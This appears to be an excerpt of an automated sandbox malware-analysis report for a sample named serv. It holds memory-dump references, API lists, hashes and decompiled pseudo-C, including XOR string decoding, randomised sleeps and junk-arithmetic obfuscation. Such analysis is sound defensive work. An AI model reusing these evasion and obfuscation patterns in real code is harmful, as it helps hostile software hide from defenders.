                                                                    0x00426df5
                                                                    0x00000000
                                                                    0x00426df5

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: _strlen$___initmbctable_strcat
                                                                    • String ID:
                                                                    • API String ID: 109824703-0
                                                                    • Opcode ID: f1416f0d3a0c6d2a16bd1a7a4719c425f4c894388eb898870c9e25717542aa2e
                                                                    • Instruction ID: e58f1c9615bcdc0196b439833a7213b3df1fe95dd253b56df45ba14356893c68
                                                                    • Opcode Fuzzy Hash: f1416f0d3a0c6d2a16bd1a7a4719c425f4c894388eb898870c9e25717542aa2e
                                                                    • Instruction Fuzzy Hash: 2A11367A7095395AD7216F20BC8066B7B96FB023A83AB027FE19143265DF7D0846974C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00424A51() {
                                                                    				signed int _t15;
                                                                    				void* _t17;
                                                                    				void* _t18;
                                                                    				intOrPtr* _t20;
                                                                    				void* _t24;
                                                                    				signed int _t26;
                                                                    				intOrPtr* _t30;
                                                                    
                                                                    				_t15 =  *0x44c27c;
                                                                    				_t26 =  *0x44c28c;
                                                                    				if(_t15 != _t26) {
                                                                    					L4:
                                                                    					_t30 =  *0x44c280 + (_t15 + _t15 * 4) * 4;
                                                                    					_t17 = RtlAllocateHeap( *0x44c294, 8, 0x41c4);
                                                                    					 *(_t30 + 0x10) = _t17;
                                                                    					if(_t17 != 0) {
                                                                    						_t18 = VirtualAlloc(0, 0x100000, 0x2000, 4);
                                                                    						 *(_t30 + 0xc) = _t18;
                                                                    						if(_t18 != 0) {
                                                                    							 *(_t30 + 8) =  *(_t30 + 8) | 0xffffffff;
                                                                    							 *_t30 = 0;
                                                                    							 *((intOrPtr*)(_t30 + 4)) = 0;
                                                                    							 *0x44c27c =  *0x44c27c + 1;
                                                                    							 *( *(_t30 + 0x10)) =  *( *(_t30 + 0x10)) | 0xffffffff;
                                                                    							_t20 = _t30;
                                                                    						} else {
                                                                    							HeapFree( *0x44c294, 0,  *(_t30 + 0x10));
                                                                    							goto L5;
                                                                    						}
                                                                    					} else {
                                                                    						L5:
                                                                    						_t20 = 0;
                                                                    					}
                                                                    					return _t20;
                                                                    				} else {
                                                                    					_t24 = RtlReAllocateHeap( *0x44c294, 0,  *0x44c280, _t26 + 0x50 + _t26 * 4 << 2);
                                                                    					if(_t24 != 0) {
                                                                    						 *0x44c28c =  *0x44c28c + 0x10;
                                                                    						 *0x44c280 = _t24;
                                                                    						_t15 =  *0x44c27c;
                                                                    						goto L4;
                                                                    					} else {
                                                                    						return 0;
                                                                    					}
                                                                    				}
                                                                    			}










                                                                    0x00424a51
                                                                    0x00424a56
                                                                    0x00424a61
                                                                    0x00424a97
                                                                    0x00424aae
                                                                    0x00424ab1
                                                                    0x00424ab9
                                                                    0x00424abc
                                                                    0x00424acf
                                                                    0x00424ad7
                                                                    0x00424ada
                                                                    0x00424aee
                                                                    0x00424af2
                                                                    0x00424af4
                                                                    0x00424af7
                                                                    0x00424b00
                                                                    0x00424b03
                                                                    0x00424adc
                                                                    0x00424ae6
                                                                    0x00000000
                                                                    0x00424ae6
                                                                    0x00424abe
                                                                    0x00424abe
                                                                    0x00424abe
                                                                    0x00424abe
                                                                    0x00424b07
                                                                    0x00424a63
                                                                    0x00424a78
                                                                    0x00424a80
                                                                    0x00424a86
                                                                    0x00424a8d
                                                                    0x00424a92
                                                                    0x00000000
                                                                    0x00424a82
                                                                    0x00424a85
                                                                    0x00424a85
                                                                    0x00424a80

                                                                    APIs
                                                                    • RtlReAllocateHeap.NTDLL(00000000,?,00000000,00425042), ref: 00424A78
                                                                    • RtlAllocateHeap.NTDLL(00000008,000041C4,00000000), ref: 00424AB1
                                                                    • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 00424ACF
                                                                    • HeapFree.KERNEL32(00000000,?), ref: 00424AE6
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Allocate$AllocFreeVirtual
                                                                    • String ID:
                                                                    • API String ID: 94566200-0
                                                                    • Opcode ID: 9124a1a32329d2b212b9bcbd1a9c6039f711298d83930f084aacada8ed70ff57
                                                                    • Instruction ID: fc462d41b16f0961c9630db00c3817e9c495f17fd3820ddc828ded977c181831
                                                                    • Opcode Fuzzy Hash: 9124a1a32329d2b212b9bcbd1a9c6039f711298d83930f084aacada8ed70ff57
                                                                    • Instruction Fuzzy Hash: 46112E34742611DFDBA1CFA9FC85A267BB6F786710754466AF161C65B0D3F09801CB18
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 37%
                                                                    			E00418330(void* __ecx) {
                                                                    				char _v2;
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v12;
                                                                    				signed int _t30;
                                                                    				void* _t38;
                                                                    				void* _t41;
                                                                    
                                                                    				_t41 =  &_v8;
                                                                    				_t30 =  *0x447d20; // 0x0
                                                                    				_v8 = 0x16;
                                                                    				_v7 = 0x12;
                                                                    				_v6 = 0xe;
                                                                    				_v5 = 0x13;
                                                                    				_v4 = 0x4a;
                                                                    				_v3 = 0x4d;
                                                                    				_v2 = 0x47;
                                                                    				_t38 = 0;
                                                                    				do {
                                                                    					_t8 = _t30 - 0x5d; // -93
                                                                    					_t30 = _t30 + ((_t8 ^ 0x0000147c) + (_t8 ^ 0x0000147c) * 0x00000008) * 0x00000008 | 0x00005be7;
                                                                    					 *(_t41 + _t38 + 4) =  *(_t41 + _t38 + 4) ^ 0x00000047;
                                                                    					_t38 = _t38 + 1;
                                                                    				} while (_t38 < 7);
                                                                    				return (0 | E00419410( *0x43003c( &_v8), __ecx,  &_v12, _t26) != 0xffffffff) - 0x00000001 & 0x00000007;
                                                                    			}














                                                                    0x00418330
                                                                    0x00418336
                                                                    0x0041833c
                                                                    0x00418341
                                                                    0x00418346
                                                                    0x0041834b
                                                                    0x00418350
                                                                    0x00418355
                                                                    0x0041835a
                                                                    0x0041835f
                                                                    0x00418361
                                                                    0x00418361
                                                                    0x00418375
                                                                    0x0041837b
                                                                    0x0041837f
                                                                    0x00418380
                                                                    0x004183af

                                                                    APIs
                                                                    • lstrlen.KERNEL32(00000016), ref: 0041838A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen
                                                                    • String ID: G$J$M
                                                                    • API String ID: 1659193697-2267652016
                                                                    • Opcode ID: 16de599d5ab267097a2452c0437a1a45ef2fba6adc7a2aabf33a276deb444dc1
                                                                    • Instruction ID: 93b4774753d4a88ee6338dc27bc8e92b1d669f058cd388f0806084fb55268ea8
                                                                    • Opcode Fuzzy Hash: 16de599d5ab267097a2452c0437a1a45ef2fba6adc7a2aabf33a276deb444dc1
                                                                    • Instruction Fuzzy Hash: 0901B57410C3C0AAD305D328D9556DEBFD09B96308F08C9ADE0C987292D7B98549D767
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 92%
                                                                    			E00416ED0(signed int __edx, void* __eflags) {
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				void* __ebp;
                                                                    				signed int _t144;
                                                                    				signed int _t153;
                                                                    				signed char _t154;
                                                                    				signed int _t155;
                                                                    				signed int _t156;
                                                                    				signed char _t159;
                                                                    				signed int _t163;
                                                                    				signed int _t166;
                                                                    				signed int _t168;
                                                                    				signed int _t173;
                                                                    				signed int _t175;
                                                                    				signed int _t177;
                                                                    				signed int _t179;
                                                                    				signed int _t181;
                                                                    				signed int _t182;
                                                                    				signed char _t189;
                                                                    				signed char _t195;
                                                                    				signed char _t201;
                                                                    				signed int _t213;
                                                                    				signed int _t214;
                                                                    				void* _t228;
                                                                    				intOrPtr _t237;
                                                                    				signed int _t238;
                                                                    				signed int _t246;
                                                                    				intOrPtr _t251;
                                                                    				signed char _t252;
                                                                    				signed int _t261;
                                                                    				void* _t266;
                                                                    				intOrPtr _t272;
                                                                    				signed int _t273;
                                                                    				signed int _t277;
                                                                    				signed int _t290;
                                                                    				signed int _t300;
                                                                    				signed int _t301;
                                                                    				signed int _t302;
                                                                    				signed int _t303;
                                                                    				signed int _t304;
                                                                    				signed int _t305;
                                                                    				signed int _t306;
                                                                    				signed int _t308;
                                                                    				signed int _t312;
                                                                    				intOrPtr* _t314;
                                                                    				intOrPtr _t319;
                                                                    				void* _t320;
                                                                    				void* _t321;
                                                                    
                                                                    				_t261 = __edx;
                                                                    				_push(0xffffffff);
                                                                    				_push(E0042FD8E);
                                                                    				_push( *[fs:0x0]);
                                                                    				 *[fs:0x0] = _t319;
                                                                    				_t320 = _t319 - 0x114;
                                                                    				 *((intOrPtr*)(_t320 + 0x3c)) = 0xf;
                                                                    				 *((intOrPtr*)(_t320 + 0x38)) = 0;
                                                                    				 *((char*)(_t320 + 0x28)) = 0;
                                                                    				 *((intOrPtr*)(_t320 + 0x12c)) = 0;
                                                                    				E00415920(_t320 + 0x40);
                                                                    				_t314 =  *((intOrPtr*)(_t320 + 0x134));
                                                                    				 *((char*)(_t320 + 0x134)) = 1;
                                                                    				E00418090(_t320 + 0xf8,  *((intOrPtr*)(_t314 + 8)),  *((intOrPtr*)(_t314 + 0x10)));
                                                                    				 *((char*)(_t320 + 0x12c)) = 2;
                                                                    				 *(_t320 + 0x14) = 0;
                                                                    				Sleep((E0040D1C0(_t261) % 0xa + 1) * 0x3e8);
                                                                    				_t213 =  *0x447d08; // 0x0
                                                                    				_t228 = 0x4c;
                                                                    				_t144 = _t213 | 0x00000021;
                                                                    				_t266 = 0x2e;
                                                                    				do {
                                                                    					_t228 = _t228 - _t144;
                                                                    					_t266 = _t266 - 1;
                                                                    				} while (_t266 != 0);
                                                                    				_t214 = _t213 + _t228 + 0x508;
                                                                    				 *(_t320 + 0x18) = _t214;
                                                                    				while(1) {
                                                                    					 *(_t320 + 0x13) = ((_t214 -  *(_t320 + 0x13)) * 0x6f >> 0x20) + 0x3c + (_t214 -  *(_t320 + 0x13)) * 0x6f;
                                                                    					if(E0041A830( *_t314, 0xa) != 0) {
                                                                    						goto L7;
                                                                    					}
                                                                    					L4:
                                                                    					if(E004073B0( *((intOrPtr*)(_t314 + 4)), 2) != 0 || E004073B0( *((intOrPtr*)(_t314 + 4)), 3) != 0) {
                                                                    						E00415840(_t320 + 0x18,  *(_t320 + 0x13), 0x4c);
                                                                    						_t214 =  *(_t320 + 0x18);
                                                                    					} else {
                                                                    						 *((char*)(_t320 + 0x12c)) = 1;
                                                                    						E00418470(_t320 + 0xf0);
                                                                    						E00415980(_t320 + 0x40);
                                                                    						__eflags =  *((intOrPtr*)(_t320 + 0x3c)) - 0x10;
                                                                    						if( *((intOrPtr*)(_t320 + 0x3c)) >= 0x10) {
                                                                    							_push( *(_t320 + 0x18));
                                                                    							L00421F9D();
                                                                    							_t320 = _t320 + 4;
                                                                    						}
                                                                    						__eflags = 0;
                                                                    						 *[fs:0x0] =  *((intOrPtr*)(_t320 + 0x114));
                                                                    						return 0;
                                                                    					}
                                                                    					L7:
                                                                    					E00415890(_t320 + 0x1b, _t214, 0x10);
                                                                    					_push(3);
                                                                    					_push(2);
                                                                    					_push(_t320 + 0x2c);
                                                                    					if(E00408590(_t320 + 0x84) != 0) {
                                                                    						_t214 = _t214 + 0x29ef;
                                                                    						__eflags = _t214;
                                                                    						 *(_t320 + 0x18) = _t214;
                                                                    						L14:
                                                                    						_t153 = E00407AC0( *((intOrPtr*)(_t314 + 4)), _t320 + 0x7c, _t320 + 0x14);
                                                                    						__eflags = _t153;
                                                                    						if(_t153 != 0) {
                                                                    							_t154 =  *(_t320 + 0x14);
                                                                    							__eflags = _t154 & 0x00000001;
                                                                    							if((_t154 & 0x00000001) != 0) {
                                                                    								L36:
                                                                    								_t155 =  *0x447d08; // 0x0
                                                                    								__eflags = _t155 - 0x6d;
                                                                    								if(__eflags >= 0) {
                                                                    									_t156 = _t155 | 0x0000002b;
                                                                    									__eflags = _t156;
                                                                    								} else {
                                                                    									_t156 = _t155 * 0x2f;
                                                                    								}
                                                                    								 *0x447d08 = _t156;
                                                                    								_push(_t320 + 0x78);
                                                                    								E00415B90(_t320 + 0x44, __eflags);
                                                                    								_t159 =  *(_t320 + 0x18);
                                                                    								_t320 = _t320 + 4;
                                                                    								__eflags = _t159 & 0x00000004;
                                                                    								if((_t159 & 0x00000004) == 0) {
                                                                    									E00402720(_t320 + 0xd8, _t314 + 0x50, 0, 0xffffffff);
                                                                    									_t237 =  *((intOrPtr*)(_t314 + 0x2c));
                                                                    									_t272 =  *((intOrPtr*)(_t314 + 0x30));
                                                                    									_t163 =  *(_t320 + 0x14) | 0x00000004;
                                                                    									__eflags = _t163;
                                                                    									 *(_t320 + 0x14) = _t163;
                                                                    								} else {
                                                                    									_t237 =  *((intOrPtr*)(_t314 + 0x1c));
                                                                    									_t272 =  *((intOrPtr*)(_t314 + 0x20));
                                                                    								}
                                                                    								 *((intOrPtr*)(_t320 + 0xf0)) = _t237;
                                                                    								 *((intOrPtr*)(_t320 + 0xf4)) = _t272;
                                                                    								E00415890(_t320 + 0x1b, _t214, 0x31);
                                                                    								_t166 =  *(_t320 + 0x14) | 0x00000002;
                                                                    								__eflags = _t166;
                                                                    								L43:
                                                                    								_t290 =  *(_t320 + 0x13);
                                                                    								_t238 =  *0x447d08; // 0x0
                                                                    								 *(_t320 + 0x14) = _t166;
                                                                    								 *(_t320 + 0x20) = _t290;
                                                                    								_t168 = _t290 * _t214;
                                                                    								__eflags = _t168;
                                                                    								_t112 = _t238 + 0x5d; // 0x5d
                                                                    								_t300 = _t112;
                                                                    								_t273 = 0x47;
                                                                    								do {
                                                                    									_t238 = _t238 + (_t168 + _t238 | _t300 | _t214);
                                                                    									_t273 = _t273 - 1;
                                                                    									__eflags = _t273;
                                                                    								} while (_t273 != 0);
                                                                    								_t314 =  *((intOrPtr*)(_t320 + 0x134));
                                                                    								 *0x447d08 = _t238;
                                                                    								E00407B10( *((intOrPtr*)(_t314 + 4)), _t320 + 0x7c, _t320 + 0x14);
                                                                    								_t301 =  *0x447d08; // 0x0
                                                                    								E00415840(_t320 + 0x18, _t290, _t301);
                                                                    								_push(_t320 + 0x40);
                                                                    								_push( *((intOrPtr*)(_t314 + 0x88)));
                                                                    								_push(_t314 + 0x6c);
                                                                    								_t173 = E004188E0(_t320 + 0xfc, __eflags);
                                                                    								__eflags = _t173;
                                                                    								if(_t173 != 0) {
                                                                    									_t214 =  *(_t320 + 0x18) *  *(_t320 + 0x18);
                                                                    									 *(_t320 + 0x1c) = _t214;
                                                                    									L00414B90( *((intOrPtr*)(_t314 + 0xc)), 0);
                                                                    									 *0x447d08 =  *0x447d08 + 0x74f5;
                                                                    									while(1) {
                                                                    										 *(_t320 + 0x13) = ((_t214 -  *(_t320 + 0x13)) * 0x6f >> 0x20) + 0x3c + (_t214 -  *(_t320 + 0x13)) * 0x6f;
                                                                    										if(E0041A830( *_t314, 0xa) != 0) {
                                                                    											goto L7;
                                                                    										}
                                                                    										goto L4;
                                                                    									}
                                                                    								}
                                                                    								_t175 =  *0x447d08; // 0x0
                                                                    								_t177 = _t175 -  *(_t320 + 0x20) + 0x27;
                                                                    								__eflags = _t177;
                                                                    								_t312 = 0x6f;
                                                                    								do {
                                                                    									_t312 = _t312 - 1;
                                                                    									__eflags = _t312;
                                                                    									 *(_t320 + 0x13) =  *(_t320 + 0x13) + _t177 + 0x5d;
                                                                    								} while (_t312 != 0);
                                                                    								L00414B90( *((intOrPtr*)(_t314 + 0xc)), 1);
                                                                    								_t179 =  *0x447d08; // 0x0
                                                                    								_t214 =  *(_t320 + 0x18);
                                                                    								 *0x447d08 = _t179 + 0x74f5;
                                                                    								while(1) {
                                                                    									 *(_t320 + 0x13) = ((_t214 -  *(_t320 + 0x13)) * 0x6f >> 0x20) + 0x3c + (_t214 -  *(_t320 + 0x13)) * 0x6f;
                                                                    									if(E0041A830( *_t314, 0xa) != 0) {
                                                                    										goto L7;
                                                                    									}
                                                                    									goto L4;
                                                                    								}
                                                                    							}
                                                                    							__eflags = _t154 & 0x00000002;
                                                                    							if((_t154 & 0x00000002) != 0) {
                                                                    								L21:
                                                                    								_t181 =  *0x447d08; // 0x0
                                                                    								__eflags = _t181 - 0x6d;
                                                                    								if(_t181 >= 0x6d) {
                                                                    									_t182 = _t181 | 0x0000002b;
                                                                    									__eflags = _t182;
                                                                    								} else {
                                                                    									_t182 = _t181 * 0x2f;
                                                                    								}
                                                                    								_t277 =  *(_t320 + 0x1c);
                                                                    								 *0x447d08 = _t182;
                                                                    								_t302 = _t182;
                                                                    								_t246 = 9;
                                                                    								do {
                                                                    									_t246 = _t246 - 1;
                                                                    									__eflags = _t246;
                                                                    									 *(_t320 + 0x1c) = _t277 +  *(_t320 + 0x1c) * 2 + _t302 + _t182 - 0x181f;
                                                                    								} while (__eflags != 0);
                                                                    								E00415A50(_t320 + 0x5c, _t320 + 0x40, __eflags);
                                                                    								_t303 =  *(_t320 + 0x1c);
                                                                    								__eflags = _t303 - 8;
                                                                    								if(_t303 >= 8) {
                                                                    									_t304 = _t303 + 0x53;
                                                                    									__eflags = _t304;
                                                                    								} else {
                                                                    									_t304 = _t303 | 0x00000031;
                                                                    								}
                                                                    								E004108E0(_t320 + 0x94);
                                                                    								_t305 = _t304 + _t304;
                                                                    								E004114B0(_t314, _t320 + 0xd0);
                                                                    								_t321 = _t320 + 8;
                                                                    								__eflags = _t305 - 8;
                                                                    								if(_t305 >= 8) {
                                                                    									_t306 = _t305 + 0x53;
                                                                    									__eflags = _t306;
                                                                    								} else {
                                                                    									_t306 = _t305 | 0x00000031;
                                                                    								}
                                                                    								 *(_t321 + 0x20) = _t306;
                                                                    								E00410DA0(_t321 + 0xb0);
                                                                    								_t320 = _t321 + 4;
                                                                    								E00415840(_t320 + 0x18,  *((char*)(_t321 + 0x17)), 0x61);
                                                                    								_t189 =  *(_t320 + 0x14);
                                                                    								__eflags = 0x00000004 & _t189;
                                                                    								if((0x00000004 & _t189) == 0) {
                                                                    									E00402720(_t320 + 0xd8, _t314 + 0x34, 0, 0xffffffff);
                                                                    									_t251 =  *((intOrPtr*)(_t314 + 0x28));
                                                                    									 *((intOrPtr*)(_t320 + 0xe8)) =  *((intOrPtr*)(_t314 + 0x24));
                                                                    									_t86 = _t320 + 0x14;
                                                                    									 *_t86 =  *(_t320 + 0x14) | 0x00000004;
                                                                    									__eflags =  *_t86;
                                                                    								} else {
                                                                    									_t251 =  *((intOrPtr*)(_t314 + 0x18));
                                                                    									 *((intOrPtr*)(_t320 + 0xe8)) =  *((intOrPtr*)(_t314 + 0x14));
                                                                    								}
                                                                    								_t214 =  *(_t320 + 0x18);
                                                                    								 *((intOrPtr*)(_t320 + 0xf0)) = _t251;
                                                                    								E00415890(_t320 + 0x17, 0, _t214);
                                                                    								_t166 =  *(_t320 + 0x14) | 0x00000001;
                                                                    								goto L43;
                                                                    							}
                                                                    							_t195 = GetTickCount();
                                                                    							__eflags = _t195 & 0x00000001;
                                                                    							if((_t195 & 0x00000001) == 0) {
                                                                    								goto L36;
                                                                    							}
                                                                    							goto L21;
                                                                    						}
                                                                    						_t252 =  *(_t320 + 0x13);
                                                                    						__eflags = 0x27;
                                                                    						_t308 = 0x6f;
                                                                    						do {
                                                                    							_t252 = _t252 + 0x27 + _t214 + 0x5d;
                                                                    							_t308 = _t308 - 1;
                                                                    							__eflags = _t308;
                                                                    						} while (_t308 != 0);
                                                                    						 *(_t320 + 0x13) = _t252;
                                                                    						while(1) {
                                                                    							 *(_t320 + 0x13) = ((_t214 -  *(_t320 + 0x13)) * 0x6f >> 0x20) + 0x3c + (_t214 -  *(_t320 + 0x13)) * 0x6f;
                                                                    							if(E0041A830( *_t314, 0xa) != 0) {
                                                                    								goto L7;
                                                                    							}
                                                                    							goto L4;
                                                                    						}
                                                                    					}
                                                                    					_push(4);
                                                                    					_push(3);
                                                                    					_push(_t320 + 0x2c);
                                                                    					if(E00408590(_t320 + 0x84) != 0) {
                                                                    						E00415840(_t320 + 0x18,  *(_t320 + 0x13), 0x10);
                                                                    						_t201 =  *(_t320 + 0x13);
                                                                    						__eflags = _t201 - 0x4c;
                                                                    						_t214 =  *(_t320 + 0x18);
                                                                    						if(_t201 >= 0x4c) {
                                                                    							 *(_t320 + 0x13) = _t201 ^ 0x0000000c;
                                                                    						} else {
                                                                    							 *(_t320 + 0x13) = _t201 ^ 0x00000071;
                                                                    						}
                                                                    						goto L14;
                                                                    					}
                                                                    					 *(_t320 + 0x13) =  *(_t320 + 0x13) + 0x23;
                                                                    				}
                                                                    			}




















































                                                                    0x00416ed0
                                                                    0x00416ed0
                                                                    0x00416ed2
                                                                    0x00416edd
                                                                    0x00416ede
                                                                    0x00416ee5
                                                                    0x00416ef1
                                                                    0x00416ef9
                                                                    0x00416efd
                                                                    0x00416f06
                                                                    0x00416f0d
                                                                    0x00416f12
                                                                    0x00416f28
                                                                    0x00416f30
                                                                    0x00416f35
                                                                    0x00416f3d
                                                                    0x00416f57
                                                                    0x00416f5d
                                                                    0x00416f65
                                                                    0x00416f6a
                                                                    0x00416f6d
                                                                    0x00416f72
                                                                    0x00416f72
                                                                    0x00416f74
                                                                    0x00416f74
                                                                    0x00416f77
                                                                    0x00416f7e
                                                                    0x00416f82
                                                                    0x00416f95
                                                                    0x00416fa6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00416fa8
                                                                    0x00416fb4
                                                                    0x00416fd6
                                                                    0x00416fdb
                                                                    0x0041733b
                                                                    0x00417342
                                                                    0x0041734a
                                                                    0x00417353
                                                                    0x00417358
                                                                    0x00417361
                                                                    0x00417367
                                                                    0x00417368
                                                                    0x0041736d
                                                                    0x0041736d
                                                                    0x00417377
                                                                    0x00417379
                                                                    0x00417386
                                                                    0x00417386
                                                                    0x00416fdf
                                                                    0x00416fe6
                                                                    0x00416feb
                                                                    0x00416fed
                                                                    0x00416ff3
                                                                    0x00417006
                                                                    0x0041705e
                                                                    0x0041705e
                                                                    0x00417064
                                                                    0x00417068
                                                                    0x00417075
                                                                    0x0041707a
                                                                    0x0041707c
                                                                    0x004170a5
                                                                    0x004170a9
                                                                    0x004170ab
                                                                    0x004171d9
                                                                    0x004171d9
                                                                    0x004171de
                                                                    0x004171e1
                                                                    0x004171e8
                                                                    0x004171e8
                                                                    0x004171e3
                                                                    0x004171e3
                                                                    0x004171e3
                                                                    0x004171eb
                                                                    0x004171f4
                                                                    0x004171f9
                                                                    0x004171fe
                                                                    0x00417202
                                                                    0x00417205
                                                                    0x00417207
                                                                    0x00417220
                                                                    0x00417229
                                                                    0x0041722c
                                                                    0x0041722f
                                                                    0x0041722f
                                                                    0x00417232
                                                                    0x00417209
                                                                    0x00417209
                                                                    0x0041720c
                                                                    0x0041720c
                                                                    0x0041723d
                                                                    0x00417244
                                                                    0x0041724b
                                                                    0x00417254
                                                                    0x00417254
                                                                    0x00417257
                                                                    0x00417257
                                                                    0x0041725c
                                                                    0x00417262
                                                                    0x00417268
                                                                    0x0041726c
                                                                    0x0041726c
                                                                    0x0041726f
                                                                    0x0041726f
                                                                    0x00417272
                                                                    0x00417277
                                                                    0x0041727e
                                                                    0x00417280
                                                                    0x00417280
                                                                    0x00417280
                                                                    0x00417283
                                                                    0x0041728a
                                                                    0x0041729d
                                                                    0x004172a2
                                                                    0x004172ae
                                                                    0x004172bd
                                                                    0x004172be
                                                                    0x004172c2
                                                                    0x004172ca
                                                                    0x004172cf
                                                                    0x004172d1
                                                                    0x0041731e
                                                                    0x00417323
                                                                    0x00417327
                                                                    0x0041732c
                                                                    0x00416f82
                                                                    0x00416f95
                                                                    0x00416fa6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00416fa6
                                                                    0x00416f82
                                                                    0x004172d3
                                                                    0x004172dc
                                                                    0x004172dc
                                                                    0x004172de
                                                                    0x004172e3
                                                                    0x004172ee
                                                                    0x004172ee
                                                                    0x004172ef
                                                                    0x004172ef
                                                                    0x004172fa
                                                                    0x004172ff
                                                                    0x00417304
                                                                    0x0041730d
                                                                    0x00416f82
                                                                    0x00416f95
                                                                    0x00416fa6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00416fa6
                                                                    0x00416f82
                                                                    0x004170b1
                                                                    0x004170b3
                                                                    0x004170c3
                                                                    0x004170c3
                                                                    0x004170c8
                                                                    0x004170cb
                                                                    0x004170d2
                                                                    0x004170d2
                                                                    0x004170cd
                                                                    0x004170cd
                                                                    0x004170cd
                                                                    0x004170d5
                                                                    0x004170da
                                                                    0x004170df
                                                                    0x004170e2
                                                                    0x004170e7
                                                                    0x004170f0
                                                                    0x004170f0
                                                                    0x004170f8
                                                                    0x004170f8
                                                                    0x00417106
                                                                    0x0041710b
                                                                    0x0041710f
                                                                    0x00417113
                                                                    0x0041711a
                                                                    0x0041711a
                                                                    0x00417115
                                                                    0x00417115
                                                                    0x00417115
                                                                    0x00417125
                                                                    0x00417132
                                                                    0x00417134
                                                                    0x00417139
                                                                    0x0041713c
                                                                    0x00417140
                                                                    0x00417147
                                                                    0x00417147
                                                                    0x00417142
                                                                    0x00417142
                                                                    0x00417142
                                                                    0x00417152
                                                                    0x00417156
                                                                    0x00417160
                                                                    0x0041716c
                                                                    0x00417171
                                                                    0x0041717a
                                                                    0x0041717c
                                                                    0x0041719c
                                                                    0x004171a4
                                                                    0x004171a7
                                                                    0x004171ae
                                                                    0x004171ae
                                                                    0x004171ae
                                                                    0x0041717e
                                                                    0x00417181
                                                                    0x00417184
                                                                    0x00417184
                                                                    0x004171b2
                                                                    0x004171c3
                                                                    0x004171cb
                                                                    0x004171d4
                                                                    0x00000000
                                                                    0x004171d4
                                                                    0x004170b5
                                                                    0x004170bb
                                                                    0x004170bd
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004170bd
                                                                    0x0041707e
                                                                    0x00417087
                                                                    0x00417089
                                                                    0x00417090
                                                                    0x00417097
                                                                    0x00417099
                                                                    0x00417099
                                                                    0x00417099
                                                                    0x0041709c
                                                                    0x00416f82
                                                                    0x00416f95
                                                                    0x00416fa6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00416fa6
                                                                    0x00416f82
                                                                    0x0041700b
                                                                    0x0041700d
                                                                    0x00417013
                                                                    0x00417023
                                                                    0x0041703d
                                                                    0x00417042
                                                                    0x00417046
                                                                    0x00417048
                                                                    0x0041704c
                                                                    0x00417058
                                                                    0x0041704e
                                                                    0x00417050
                                                                    0x00417050
                                                                    0x00000000
                                                                    0x0041704c
